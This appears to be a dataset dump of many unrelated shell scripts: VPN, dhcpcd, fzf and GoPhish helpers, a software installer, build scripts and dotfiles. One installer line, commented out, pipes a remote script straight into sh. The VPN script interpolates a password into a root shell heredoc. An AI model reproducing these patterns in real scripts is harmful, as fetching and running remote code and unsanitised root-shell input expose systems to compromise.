    err "Usage: $0 <config> <password> [--with-vpnslice=false]";
    exit 1;
fi

CONFIG=$1
PASSWORD=$2
# BUG FIX: the third argument is optional, but `SECRET=$3` (and the later
# "$3" test) aborted the script under `set -u` whenever it was omitted.
# Default to empty instead.
SECRET=${3:-}

if [[ "${SECRET}" == "--with-vpnslice=false" ]]; then
    WITH_VPNSLICE=false
fi
# Print setup instructions and abort; used whenever the config dir or one
# of its required files is missing.
setup_help() {
    err "$CONFIG should exist and contain files: [username, host and slice]."
    err "Run setup.sh"
    exit 2;
}

# $CONFIG is now quoted so directory names with spaces are handled; the
# unused config_files array was removed as dead code.
[ ! -d "$CONFIG" ] && setup_help

for f in username host slice; do
    if [ ! -f "$CONFIG/$f" ]; then
        setup_help
    fi
done
# Pull the connection parameters out of the config directory.
USERNAME=$(head -n 1 "$CONFIG/username")
HOST=$(head -n 1 "$CONFIG/host")
SLICES=$(cat "$CONFIG/slice" | tr '\n' ' ')
# BUG FIX: servercert is optional, but when the file was absent this
# assignment's command substitution returned 1 and `set -o errexit` killed
# the whole script. `|| true` keeps the empty assignment and continues.
SERVERCERT=$(test -f "$CONFIG/servercert" && cat "$CONFIG/servercert") || true
info -------------------------
info OPENCONNECT: $OPENCONNECT
info VPN-SLICE: $VPNSLICE
info USERNAME: $USERNAME
info HOST: $HOST
info SERVERCERT: $SERVERCERT
info -------------------------
info "Kicking off keep-alive pinger."
PINGHOSTS=$CONFIG/pinghosts
# NOTE(review): BGPID is initialised here but never assigned $! when the
# pinger is launched; the cleanup below falls back to ps|grep instead.
BGPID=
if [ -f $PINGHOSTS ]; then
    # Background pinger keeps the tunnel alive while openconnect runs.
    $DIR/vpn-keepalive.sh $PINGHOSTS &
fi
info "Running openconnect as sudo..."
# Turn the raw cert fingerprint into the openconnect flag form.
if [ ! -z "$SERVERCERT" ]; then
    SERVERCERT="--servercert $SERVERCERT"
fi
# Optionally route only the configured slices through vpn-slice.
VPNC_SCRIPT=""
if [[ $WITH_VPNSLICE == "true" ]]; then
    VPNC_SCRIPT=" -s '${VPNSLICE} ${SLICES}' "
fi
# Heredoc is unquoted on purpose: the password/host/flags are expanded here
# and the resulting command runs inside a root shell, feeding the password
# to openconnect on stdin. This blocks until the VPN session ends.
sudo sh <<EOF
printf '${PASSWORD}' | $OPENCONNECT $SERVERCERT --libproxy --passwd-on-stdin --user='$USERNAME' $VPNC_SCRIPT $HOST
echo "Shutting down"
EOF
if [ -f $PINGHOSTS ]; then
    echo "Killing keep alive $BGPID"
    # [v] in the pattern keeps this grep from matching its own process.
    BPID=$(ps S | grep '[v]pn-keepalive.sh' | awk '{print $1}')
    kill -9 $BPID
fi
echo "Done"
| true |
9bb990902937774d3f7115f2205d5955d274b3b9 | Shell | ralberts/coffee-dash-button | /dashButton/start.sh | UTF-8 | 271 | 3 | 3 | [] | no_license | #!/bin/bash
# Start the coffee dash-button listener unless a "coffee" process is
# already running for this terminal's process list.
coffeeProcess=$(ps a | grep -v grep | grep coffee)
if [ -z "$coffeeProcess" ]
then
  # BUG FIX: guard the cd — previously a failed cd would still run
  # `npm start` from whatever the current directory happened to be.
  cd /home/pi/Desktop/coffee-dash-button/dashButton || exit 1
  sudo npm start &> /home/pi/Desktop/coffee-dash-button/dashButton/output.txt
else
  echo "Coffee script already running."
fi
0aef6280615222b811d8cf854f7040b0c47026ac | Shell | camuso/scripts | /foreachfile | UTF-8 | 2,243 | 4.53125 | 5 | [] | no_license | #!/bin/bash
#
# foreachfile
#
# filename placeholder token to be used from the command line and for
# substitution in the individual commands
#
token="%"
# Multi-line usage text; %s-style expansion is not used, the trailing \0
# is consumed by echo -e as a string terminator.
usagestr=$(
cat <<EOF
foreachfile filespec body
filespec - file specification, can have wildcards
body - body of the loop
Both filespec and body must be enclosed in double quotes.
In the body of the loop, the current file is denoted by
this token: '$token'
Use \\ to escape \\ , %, $, etc.
Example:
foreachfile "*.patch" "echo $token; grep -m1 'Subject' $token"
\0
EOF
)
# Print usage and exit (status 0 — this is the help path).
usage() {
echo -e "$usagestr"
exit
}
#
# If the command contains the token, then replace it with the current filename
# and execute the command.
#
# $1 - current filename
# $2 - command
#
parse_cmd() {
local file="$1" # get the name of the current file
shift # shift past the filename
local cmd="$@" # remainder of command line is command string
local ary=($cmd) # create an array from the command string
local index=0 # index for the array
for index in "${!ary[@]}"; do
[[ ${ary[$index]} == "$token" ]] && ary[$index]="$file"
done
echo "${ary[@]}" >> /tmp/cmd
}
[ $# -gt 0 ] || usage
# shopt -s extglob
declare filespec="$1" # file specification including wildcards
declare files=$(ls -1 $filespec) # list of files
echo -e \
" List of Files\n"\
"============="
echo "$files"
shift # shift past the file specification
declare body="$@" # remainder of command line is loop body
declare cmdary # array of commands to be executed in loop
# Create a dummy script file to execute the commands
# NOTE(review): /tmp/cmd is a fixed, predictable path in a shared directory —
# consider mktemp to avoid clobbering/symlink issues on multi-user systems.
touch /tmp/cmd
chmod +x /tmp/cmd
# Tokenize the loop body into an array using ';' as the IFS separator.
#
IFS=";" read -ra cmdary <<<"$body"
echo -e \
"\n List of Commands\n"\
"================"
for key in "${!cmdary[@]}"; do echo $key ${cmdary[$key]}; done
# For each for the files in the list, execute the body of commands
#
for f in $files; do
> /tmp/cmd
# Substitute the token with the file name in each command that has
# a token and write the command line out to the /tmp/cmd file.
#
for key in "${!cmdary[@]}"; do
parse_cmd $f "${cmdary[$key]}"
done
# Execute the commands
#
/tmp/cmd
done
# Delete the dummy script file
#
rm -f /tmp/cmd
| true |
763ec41ebce7fe51bb6ac822fd8c64dc0569148e | Shell | cisagov/pca-gophish-composition | /gophish-tools/complete_campaign.sh | UTF-8 | 1,163 | 4.28125 | 4 | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | #!/usr/bin/env bash
# complete_campaign.sh CAMPAIGN_ID
# This script simplifies the process of completing a campaign on the
# GoPhish server running in the local Docker composition.
set -o errexit
set -o nounset
set -o pipefail
# Exactly one argument (the campaign id) is required; -h/--help prints usage.
if [ $# -ne 1 ] || [ "$1" == "-h" ] || [ "$1" == "--help" ]; then
echo "Usage: complete_campaign.sh CAMPAIGN_ID"
exit 255
fi
# Source common variables and functions
SCRIPTS_DIR=$(readlink -f "$0" | xargs dirname)
# shellcheck source=gophish-tools/gophish_common.sh
source "$SCRIPTS_DIR/gophish_common.sh"
CAMPAIGN_ID=$1
# Disable errexit to allow error-handling within get_gophish_api_key
# and for the subsequent docker compose call to gophish-complete
set +o errexit
# Fetch GoPhish API key
API_KEY=$(get_gophish_api_key)
# Run gophish-complete in the Docker composition
docker compose -f "$GOPHISH_COMPOSITION" run --rm \
gophish-tools gophish-complete "--campaign=$CAMPAIGN_ID" \
"$GOPHISH_URL" "$API_KEY"
# Capture and report the container's exit code ourselves (errexit is off).
complete_rc="$?"
if [ "$complete_rc" -eq 0 ]; then
echo "GoPhish campaign $CAMPAIGN_ID successfully completed!"
else
echo "ERROR: Failed to complete GoPhish campaign $CAMPAIGN_ID!"
exit $complete_rc
fi
| true |
d039f6ec8f873f10d8dea2e659573cfa90f8c31f | Shell | freebsd/freebsd-ports | /net/dhcpcd/files/dhcpcd.in | UTF-8 | 745 | 3.53125 | 4 | [
"BSD-2-Clause"
] | permissive | #!/bin/sh
# PROVIDE: dhclient dhcpcd
# KEYWORD: nojailvnet
#
# FreeBSD rc.d service script for dhcpcd; relies on the rc.subr framework
# for load_rc_config / run_rc_command.
. /etc/rc.subr
. /etc/network.subr
name="dhcpcd"
# When invoked per-interface the interface name arrives as the 2nd argument.
ifn="$2"
command="%%PREFIX%%/sbin/dhcpcd"
command_args="$ifn"
if [ -n "$ifn" ]; then
# Per-interface mode: allow dhcpcd_flags_<IF> overrides unless global
# flags were already given, and use the per-interface pidfile.
specific="$(get_if_var $ifn dhcpcd_flags_IF)"
if [ -z "$flags" -a -n "$specific" ]; then
rc_flags="$specific"
fi
pidfile="/var/run/dhcpcd/dhcpcd-$ifn.pid"
else
# Master (all-interfaces) mode: ask dhcpcd itself for its pidfile path.
pidfile="$($command -P $rc_flags)"
: ${dhcpcd_enable:=NO}
rcvar=dhcpcd_enable
fi
start_precmd="dhcpcd_precmd"
dhcpcd_precmd()
{
# dhcpcd may need local binaries
export PATH=${PATH}:/usr/local/sbin:/usr/local/bin
}
load_rc_config $name
load_rc_config network
# Refuse to start on an interface that rc.conf has not marked for DHCP.
if [ -n "$ifn" ]; then
if ! dhcpif $ifn; then
err 1 "$ifn is not enabled for DHCP"
fi
fi
run_rc_command "$1"
| true |
fd5f9259d3002d6751e1e1579b4bf1da939087d2 | Shell | dunstontc/dotfiles | /shell/functions/.fzf.functions.sh | UTF-8 | 2,195 | 3.5 | 4 | [
"MIT"
] | permissive | #
# @file FZF Functions
# @brief Small utility functions using fzf.
# @description Figlet font selector -> copy to clipboard.
#
# @arg $@ string Word or words to make into ascii art.
fgl() {
[ $# -eq 0 ] && return
cd /usr/local/Cellar/figlet/*/share/figlet/fonts
local font=$(ls *.flf | sort | fzf --no-multi --reverse --preview "figlet -f {} $@") &&
figlet -f "$font" "$@" | pbcopy
}
# @description fe - fuzzy edit.
#
# @arg $1 string Name of the file to edit.
fe() {
local files
IFS=$'\n' files=($(fzf-tmux --query="$1" --multi --select-1 --exit-0))
[[ -n "$files" ]] && ${EDITOR:-nvim} "${files[@]}"
}
# @description vf - fuzzy open with vim from anywhere
#
# @example
# vf word1 word2 ... (even part of a file name)
vf() {
local files
files=(${(f)"$(locate -Ai -0 $@ | grep -z -vE '~$' | fzf --read0 -0 -1 -m)"})
if [[ -n $files ]]
then
nvim -- $files
print -l $files[1]
fi
}
# @description fuzzy grep - open via ag
#
vg() {
local file
file="$(ag --nobreak --noheading $@ | fzf -0 -1 | awk -F: '{print $1 " +" $2}')"
if [[ -n $file ]]
then
nvim $file
fi
}
# @description Search command history with FZF.
fh() {
print -z $( ([ -n "$ZSH_NAME" ] && fc -l 1 || history) | fzf +s --tac | sed 's/ *[0-9]* *//')
}
# @description Create new tmux session, or switch to existing one. Works from within tmux too. (@bag-man)
#
# @example
# tm # will allow you to select your tmux session via fzf.
#
# tm irc # will attach to the irc session (if it exists), else it will create it.
#
# @arg $1 string Session name
tm() {
[[ -n "$TMUX" ]] && change="switch-client" || change="attach-session"
if [ $1 ]; then
tmux $change -t "$1" 2>/dev/null || (tmux new-session -d -s $1 && tmux $change -t "$1"); return
fi
session=$(tmux list-sessions -F "#{session_name}" 2>/dev/null | fzf --exit-0) && tmux $change -t "$session" || echo "No sessions found."
}
# @description fzkill - kill process
fzkill() {
local pid
pid=$(ps -ef | sed 1d | fzf -m | awk '{print $2}')
if [ "x$pid" != "x" ]
then
echo $pid | xargs kill -${1:-9}
fi
}
# vim:filetype=sh:foldmethod=indent:tabstop=4:shiftwidth=4:softtabstop=0:noexpandtab:
| true |
1de07fa3b3ceb00b50765852b66a74783003271e | Shell | AhmedSakrr/marla-server | /run.sh | UTF-8 | 616 | 3.53125 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/sh
next_server_port() {
port=`sed -nre '/^PORT=/s/PORT=//p' port.mk`
host=localhost
if echo $port | grep -q ':'; then
host=`echo $port | grep -Eoe '^[^:]+'`
port=`echo $port | sed -nre 's/^[^:]+://p'`
fi
port=$(($port + 1))
sed -i -re "s/^PORT=.+$/PORT=$host:$port/" port.mk
}
run_server() {
starttime=`date +%s`
make run
donetime=`date +%s`
if test $(($starttime - $donetime)) -lt 1; then
make kill
next_server_port
make run
authority=`sed -nre '/^PORT=/s/PORT=//p' port.mk`
echo "Running on $authority"
echo $authority | xsel -b -i
else
exit
fi
}
run_server
make tmux
| true |
034f482d69c1b38ab0e8b509ba3b2113cdba41e5 | Shell | mprather1/spyware | /run/software_installation.sh | UTF-8 | 4,871 | 3.5 | 4 | [] | no_license | #!/usr/bin/env bash
install_software(){
if chkarg $software_type; then
pre_install
printf "\n$(random_color)Installing software${NC}...\n"
sudo apt-get update && \
sudo apt-get install $new_software -y
misc_software
echo "All Done!!"
fi
}
initialize(){
mkdir temp
case $dist in
"Raspbian GNU/Linux 8")
node_version='https://nodejs.org/dist/v12.13.0/node-v12.13.0-linux-armv7l.tar.xz'
;;
"Raspbian GNU/Linux 9")
node_version='https://nodejs.org/dist/v12.13.0/node-v12.13.0-linux-armv7l.tar.xz'
;;
"Raspbian GNU/Linux 10")
node_version='https://nodejs.org/dist/v12.13.0/node-v12.13.0-linux-armv7l.tar.xz'
;;
*)
node_version='https://nodejs.org/dist/v12.13.0/node-v12.13.0-linux-x64.tar.xz'
;;
esac
}
pre_install(){
printf "\n$(random_color)Pre-install${NC}...\n"
if not_installed curl; then
sudo apt-get update && \
sudo apt-get install curl -y
fi
if not_installed apt-transport-https; then
sudo apt-get update && \
sudo apt-get install apt-transport-https -y
fi
if not_installed software-properties-common; then
sudo apt-get update && \
sudo apt-get install software-properties-common -y
fi
install_repositories
misc_repos
get_software_list
}
install_repositories(){
printf "\n$(random_color)Installing repositories${NC}...\n"
repositories=$(directory)/run/software_lists/${software_type}/repos.txt
readarray repos < $repositories
for repo in "${repos[@]}"; do
if chkarg $repo && repo_not_installed $repo; then
sudo apt-add-repository $repo -y
fi
done
}
get_software_list(){
software=$(directory)/run/software_lists/${software_type}/software.txt
readarray software_list < $software
for software in "${software_list[@]}"; do
new_software+="${software}"
done
}
misc_software(){
printf "\n$(random_color)Installing miscellaneous software${NC}...\n"
if [ $software_type != 'rpi' ]; then
install_npm_packages
sudo usermod -aG docker $(whoami)
# install_c9
# install_python_packages
# install_ruby_gems
fi
if [ $software_type == 'desktop' ]; then
#fix # install_local_packages
# install_postman
fi
sudo apt-get upgrade -y
}
misc_repos(){
printf "\n$(random_color)Installing miscellaneous repositories${NC}...\n"
if not_installed yarn; then
curl -sS https://dl.yarnpkg.com/debian/pubkey.gpg | sudo apt-key add -
echo "deb https://dl.yarnpkg.com/debian/ stable main" | sudo tee /etc/apt/sources.list.d/yarn.list
fi
# case $software_type in
# "rpi")
# # if not_installed docker-engine; then
# # curl -sSL https://get.docker.com | sh
# # fi
# ;;
# *)
# # install_docker
# ;;
# esac
}
install_docker(){
if not_installed docker-engine; then
sudo apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D
sudo apt-add-repository 'deb https://apt.dockerproject.org/repo ubuntu-xenial main'
fi
if [ -d /usr/local/bin ] && [ ! -f /usr/local/bin/docker-compose ]; then
printf "$(random_color)Installing Docker Compose${NC}..."
curl -L https://github.com/docker/compose/releases/download/1.12.0-rc2/docker-compose-`uname -s`-`uname -m` > temp/docker-compose
sudo cp temp/* /usr/local/bin/ && \
sudo chmod +x /usr/local/bin/docker-compose
fi
}
install_local_packages(){
printf "\n$(random_color)Installing local packages${NC}...\n"
sudo dpkg -i $(directory)/misc/synergy.deb $(directory)/misc/xscreensaver.deb
}
install_ruby_gems(){
printf "\n$(random_color)Ruby gems${NC}...\n"
echo "gem: --no-document" >> /home/$user/.gemrc
bash $(directory)/misc/ruby_gems.sh
}
install_npm_packages(){
printf "\n$(random_color)NPM packages${NC}...\n"
bash $(directory)/misc/npm.sh
}
install_python_packages(){
printf "\n$(random_color)Python packages${NC}...\n"
bash $(directory)/misc/python.sh
}
install_postman(){
wget -O temp/postman.tar.gz https://dl.pstmn.io/download/latest/linux64 && \
tar -xvf temp/postman.tar.gz -C $HOME && \
chmod +x $(directory)/misc/postman && \
sudo cp $(directory)/misc/postman /usr/local/bin
}
install_node(){
if [ ! -f /usr/local/bin/node ]; then
printf "$(random_color)Installing Node.JS${NC}..."
strip_url="${node_version##*/}"
node_directory=${strip_url%.*.*}
wget $node_version -O temp/node.tar.xz
tar -xvf temp/node.tar.xz -C temp/
sudo cp -R temp/$node_directory/* /usr/local/
else
printf "\nnode is already installed\nskipping...\n"
fi
}
install_scripts(){
printf "\n$(random_color)Installing scripts${NC}...\n"
scripts=($(directory)/scripts/*/*.sh)
for script in "${scripts[@]}"; do
installer $script
done
}
install_c9(){
printf "\n$(random_color)Installing c9${NC}...\n"
bash $(directory)/misc/c9/install.sh
}
| true |
ac52b34d88f2bdd282f4ea44bcb1fa640883c706 | Shell | edmond-zhu/awcy | /build_av1_analyzer.sh | UTF-8 | 1,262 | 3.171875 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# exit on failure
set -e
# exit on unassigned variable
set -u
echo "Building Analyzer"
# add emscripten tools to PATH
export PATH=${PATH}:$(em-config EMSCRIPTEN_ROOT):$(em-config LLVM_ROOT)
cd ${CODECS_SRC_DIR}/${CODEC}
rm -rf asm/
mkdir -p asm
pushd asm
if [[ "${BUILD_OPTIONS}" == *"--enable"* ]]; then
#legacy configure
popd
make distclean || true
pushd asm
emconfigure ../configure --disable-multithread --disable-runtime-cpu-detect --target=generic-gnu --enable-accounting --enable-inspection --disable-docs --disable-webm-io --extra-cflags="-D_POSIX_SOURCE" ${BUILD_OPTIONS}
emmake make -j$(nproc)
cp examples/inspect inspect.bc
emcc -O3 inspect.bc -o inspect.js -s TOTAL_MEMORY=402653184 -s MODULARIZE=1 -s EXPORT_NAME="'DecoderModule'" --post-js "../tools/inspect-post.js" --memory-init-file 0
popd
cp asm/inspect.js ./aomanalyzer.js
else
cmake ../ -DAOM_TARGET_CPU=generic -DCONFIG_MULTITHREAD=0 -DCONFIG_RUNTIME_CPU_DETECT=0 -DCONFIG_ACCOUNTING=1 -DCONFIG_INSPECTION=1 -DENABLE_DOCS=0 -DCONFIG_WEBM_IO=0 -DENABLE_TESTS=0 -DCMAKE_TOOLCHAIN_FILE=$(em-config EMSCRIPTEN_ROOT)/cmake/Modules/Platform/Emscripten.cmake ${BUILD_OPTIONS}
emmake make -j$(nproc)
popd
cp asm/examples/inspect.js ./aomanalyzer.js
fi
| true |
0d887e889915f9b855b9c3b8e4f3c764fd2ab6f6 | Shell | jensp/Arch-Linux-on-i586 | /extra/psiconv/PKGBUILD | UTF-8 | 769 | 2.609375 | 3 | [] | no_license | # $Id: PKGBUILD 44521 2009-07-02 15:35:35Z giovanni $
# Maintainer: Giovanni Scafora <giovanni@archlinux.org>
# Contributor: Tom Newsom <Jeepster@gmx.co.uk>
pkgname=psiconv
pkgver=0.9.8
pkgrel=5
pkgdesc="Converts Psion 5(MX) files to more commonly used file formats"
arch=('i586' 'i686' 'x86_64')
url="http://software.frodo.looijaard.name/psiconv/"
license=('GPL')
depends=('imagemagick>=6.4.8.10')
makedepends=('bc')
backup=('etc/psiconv/psiconv.conf')
options=('!libtool')
source=(http://software.frodo.looijaard.name/psiconv/files/psiconv-${pkgver}.tar.gz)
md5sums=('8d7548e3c6b9cd408544736133728acd')
build() {
cd ${srcdir}/${pkgname}-${pkgver}
./configure --prefix=/usr \
--sysconfdir=/etc \
--mandir=/usr/share/man
make || return 1
make DESTDIR=${pkgdir} install
}
| true |
cda16638fb8c3401436466fd8efeb421447153d6 | Shell | dziamid/dotfiles | /bashrc | UTF-8 | 4,021 | 3.765625 | 4 | [] | no_license | # ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If not running interactively, don't do anything
[ -z "$PS1" ] && return
# don't put duplicate lines in the history. See bash(1) for more options
# ... or force ignoredups and ignorespace
HISTCONTROL=ignoredups:ignorespace
# append to the history file, don't overwrite it
shopt -s histappend
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000
# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize
# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
#alias ls='ls --color=auto'
#alias dir='dir --color=auto'
#alias vdir='vdir --color=auto'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
fi
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
. ~/bin/dotfiles/bash/env
. ~/bin/dotfiles/bash/config
. ~/bin/dotfiles/bash/aliases
# wrap_alias takes three arguments:
# $1: The name of the alias
# $2: The command used in the alias
# $3: The arguments in the alias all in one string
# Generate a wrapper completion function (completer) for an alias
# based on the command and the given arguments, if there is a
# completer for the command, and set the wrapper as the completer for
# the alias.
function wrap_alias() {
[[ "$#" == 3 ]] || return 1
local alias_name="$1"
local aliased_command="$2"
local alias_arguments="$3"
local num_alias_arguments=$(echo "$alias_arguments" | wc -w)
# The completion currently being used for the aliased command.
local completion=$(complete -p $aliased_command 2> /dev/null)
# Only a completer based on a function can be wrapped so look for -F
# in the current completion. This check will also catch commands
# with no completer for which $completion will be empty.
echo $completion | grep -q -- -F || return 0
local namespace=alias_completion::
# Extract the name of the completion function from a string that
# looks like: something -F function_name something
# First strip the beginning of the string up to the function name by
# removing "* -F " from the front.
local completion_function=${completion##* -F }
# Then strip " *" from the end, leaving only the function name.
completion_function=${completion_function%% *}
# Try to prevent an infinite loop by not wrapping a function
# generated by this function. This can happen when the user runs
# this twice for an alias like ls='ls --color=auto' or alias l='ls'
# and alias ls='l foo'
[[ "${completion_function#$namespace}" != $completion_function ]] && return 0
local wrapper_name="${namespace}${alias_name}"
eval "
function ${wrapper_name}() {
let COMP_CWORD+=$num_alias_arguments
args=( \"${alias_arguments}\" )
COMP_WORDS=( $aliased_command \${args[@]} \${COMP_WORDS[@]:1} )
$completion_function
}
"
# To create the new completion we use the old one with two
# replacements:
# 1) Replace the function with the wrapper.
local new_completion=${completion/-F * /-F $wrapper_name }
# 2) Replace the command being completed with the alias.
new_completion="${new_completion% *} $alias_name"
eval "$new_completion"
}
# For each defined alias, extract the necessary elements and use them
# to call wrap_alias.
eval "$(alias -p | sed -e 's/alias \([^=][^=]*\)='\''\([^ ][^ ]*\) *\(.*\)'\''/wrap_alias \1 \2 '\''\3'\'' /')"
unset wrap_alias
| true |
c4c4925b34337d1b341d155fde2eebcdac320611 | Shell | ksong/starts-travis-ingetration | /legacy/generate-basic-stats.sh | UTF-8 | 4,074 | 4.125 | 4 | [] | no_license | #!/bin/bash
set -o pipefail
usage() {
echo "Usage: $0 [-h] -v -l /path/to/mvn/log -d /path/to/repo/directory -k APIKEY" 1>&2; exit 1;
}
exitIfHasError() {
if [[ $? != 0 ]]; then
exit 1
fi
}
while getopts ":hvl:d:k:" o; do
case "${o}" in
h)
echo "Collect statistics for basic statistics with STARTS."
usage
;;
v)
echo "Enabling Verbose Mode"
VERBOSE=1
;;
d)
REPO_DIR=${OPTARG}
;;
k)
APIKEY=${OPTARG}
;;
l)
LOG_FILE=${OPTARG}
USE_LOG_FILE=1
;;
*)
usage
;;
esac
done
shift $((OPTIND-1))
if [ -z "${REPO_DIR}" ]; then
echo "Error: repository directory undefined." 1>&2;
usage
fi
if [[ $USE_LOG_FILE == 1 && -z "${LOG_FILE}" ]]; then
echo "Error: mvn test log file localtion undefined." 1>&2;
usage
fi
if [[ ! -d $REPO_DIR ]]; then
echo "$REPO_DIR is not a valid directory for the repo." 1>&2;
usage;
fi
if [[ -z $APIKEY ]]; then
APIKEY=$GITHUB_APIKEY
fi
CUR_DIR="$( cd "$( dirname "$0" )" && pwd )";
if [ -z $LOG_FILE ]; then
cd $REPO_DIR
LOG_LOCAL_RUN="/tmp/local.log"
mvn test > $LOG_LOCAL_RUN
else
LOG_LOCAL_RUN="${LOG_FILE}"
fi
if [[ -z `cat $LOG_LOCAL_RUN|grep --line-buffered SUCCESS` ]]; then
echo "'mvn test' build failed." 2>&1;
exit 1;
fi
exitIfHasError;
LOCAL_TIME=`cat $LOG_LOCAL_RUN|grep --line-buffered "Total time:"|cut -d" " -f4`
exitIfHasError;
if [[ $LOCAL_TIME == *":"* ]]; then
LOCAL_TIME=`echo $LOCAL_TIME | awk -F: '{ print ($1 * 60) + $2 }'`
fi
if [[ $USE_LOG_FILE -eq 1 ]]; then
#When using log file, it's only for local mode
echo $LOCAL_TIME
exit 0;
fi
##Setting to trigger Travis run
# Enable Travis CI using Github API. Need to install TravisPy
PRJOECT_NAME=${REPO_DIR##*/}
if [[ -z $PRJOECT_NAME ]]; then
echo "Invalid project name: $PRJOECT_NAME"
echo "Please make sure the directory doesn't end with '/'"
exit 1;
fi
if [[ -z $APIKEY ]]; then
if [[ $VERBOSE == 1 ]]; then echo "python $CUR_DIR/enable-travis-and-run.py \"ksong/$PRJOECT_NAME\""; fi
RESULT=`python $CUR_DIR/enable-travis-and-run.py "ksong/$PRJOECT_NAME"`
else
if [[ $VERBOSE == 1 ]]; then echo "python $CUR_DIR/enable-travis-and-run.py -k $APIKEY \"ksong/$PRJOECT_NAME\""; fi
RESULT=`python $CUR_DIR/enable-travis-and-run.py -k $APIKEY "ksong/$PRJOECT_NAME"`
fi
##No rebuild, then either create the .travis.yml or add a line of comment
# then push to the repo to trigger travis CI build
if [[ $RESULT != "REBUILT" ]]; then
if [[ ! -f ${REPO_DIR}/.travis.yml ]]; then
if [[ $VERBOSE == 1 ]]; then echo "creating .travis.yml file"; fi
echo "language: java" > ${REPO_DIR}/.travis.yml
else
if [[ $VERBOSE == 1 ]]; then echo ".travis.yml file exists, slightly modify it."; fi
echo "#Add this line to trigger Travis build" >> ${REPO_DIR}/.travis.yml
fi
cd ${REPO_DIR}
git add .travis.yml
git config user.name "Kai Song"
git config user.email "kaisong2@illinois.edu"
git commit -m "added .travis.yml"
git push origin master
fi
## A travis build should just happened. Now, we save the test relevant logs to
# /tmp/test_log.txt
if [[ -z $APIKEY ]]; then
RESULT=`python $CUR_DIR/save-travis-build-log.py "ksong/$PRJOECT_NAME"`
else
RESULT=`python $CUR_DIR/save-travis-build-log.py -k $APIKEY "ksong/$PRJOECT_NAME"`
fi
TRAVIS_TEST_TIME=`cat /tmp/test_log.txt |grep --line-buffered "Total time:"|cut -d" " -f4`
exitIfHasError;
if [[ $TRAVIS_TEST_TIME == *":"* ]]; then
TRAVIS_TEST_TIME=`echo $TRAVIS_TEST_TIME | awk -F: '{ print ($1 * 60) + $2 }'`
fi
TRAVIS_BUILD_TIME=`cat /tmp/test_log.txt |grep --line-buffered "Last Travis Build Time:"|cut -d" " -f5`
exitIfHasError;
if [[ $TRAVIS_BUILD_TIME == *":"* ]]; then
TRAVIS_BUILD_TIME=`echo $TRAVIS_BUILD_TIME | awk -F: '{ print ($1 * 60) + $2 }'`
fi
echo $LOCAL_TIME,$TRAVIS_TEST_TIME,$TRAVIS_BUILD_TIME
| true |
a78e82b51862d8d7eedabe3c43f95a4a3c0a9293 | Shell | awilhelm/misc | /lib/wallpaper-roulette/google | UTF-8 | 668 | 3.109375 | 3 | [] | no_license | #!/bin/sh
: ${1:?} # recherche (exemple : q=wallpaper&as_st=y&tbs=isz:lt,islt:2mp,iar:w&tbm=isch')
: ${2:?} # pages à explorer (exemple : 1-10)
: ${TMPDIR:?}
while ! nm-online -q
do sleep 1
done
url=$((($(shuf -n1 -i "$2") - 1) * 10))
url=$(wget -q -O- "http://www.google.com/search?biw=1000&bih=1000&start=$url&$1" --user-agent='Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0' | perl -ne 'for(m{;imgurl=(.*?)&}g){s{%([0-9a-f]{2})}{chr(hex($1))}eig; s{%([0-9a-f]{2})}{chr(hex($1))}eig; print "$_\n"}' | shuf -n1 | wget -i- -nv -c -x --protocol-directories -P "$TMPDIR" 2>&1 | perl -ne 'if(m{ -> "(.*)"}){print $1}')
test -r "$url" && echo "$url"
| true |
84e79d2944b2ac287473e433092c889a4e202502 | Shell | space-sh/docker-volumes | /test/test.sh | UTF-8 | 1,281 | 3.359375 | 3 | [
"Apache-2.0"
] | permissive | #
# Copyright 2016-2017 Blockie AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
_DOCKER_CHECK_NO_VOLUME ()
{
SPACE_SIGNATURE="name"
SPACE_DEP="DOCKER_VOLUMES_LS PRINT"
local name="${1}"
shift
local volumes=
volumes="$(DOCKER_VOLUMES_LS -q | grep "^${name}\$"; :)"
if [ -n "${volumes}" ]; then
PRINT "Volume ${name} exists." "error"
return 1
fi
}
_DOCKER_CHECK_VOLUME ()
{
# shellcheck disable=2034
SPACE_SIGNATURE="name"
# shellcheck disable=2034
SPACE_DEP="DOCKER_VOLUMES_LS PRINT"
local name="${1}"
shift
local volumes=
volumes="$(DOCKER_VOLUMES_LS -q | grep "^${name}\$"; :)"
if [ -z "${volumes}" ]; then
PRINT "Volume ${name} does not exist." "error"
return 1
fi
}
| true |
08a64bbb7a4891fc5d5fd33fae04394b20759898 | Shell | openstack/diskimage-builder | /diskimage_builder/elements/python-brickclient/post-install.d/55-brick-client-install | UTF-8 | 997 | 2.640625 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
#
# Copyright 2016 Hewlett Packard Enterprise Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
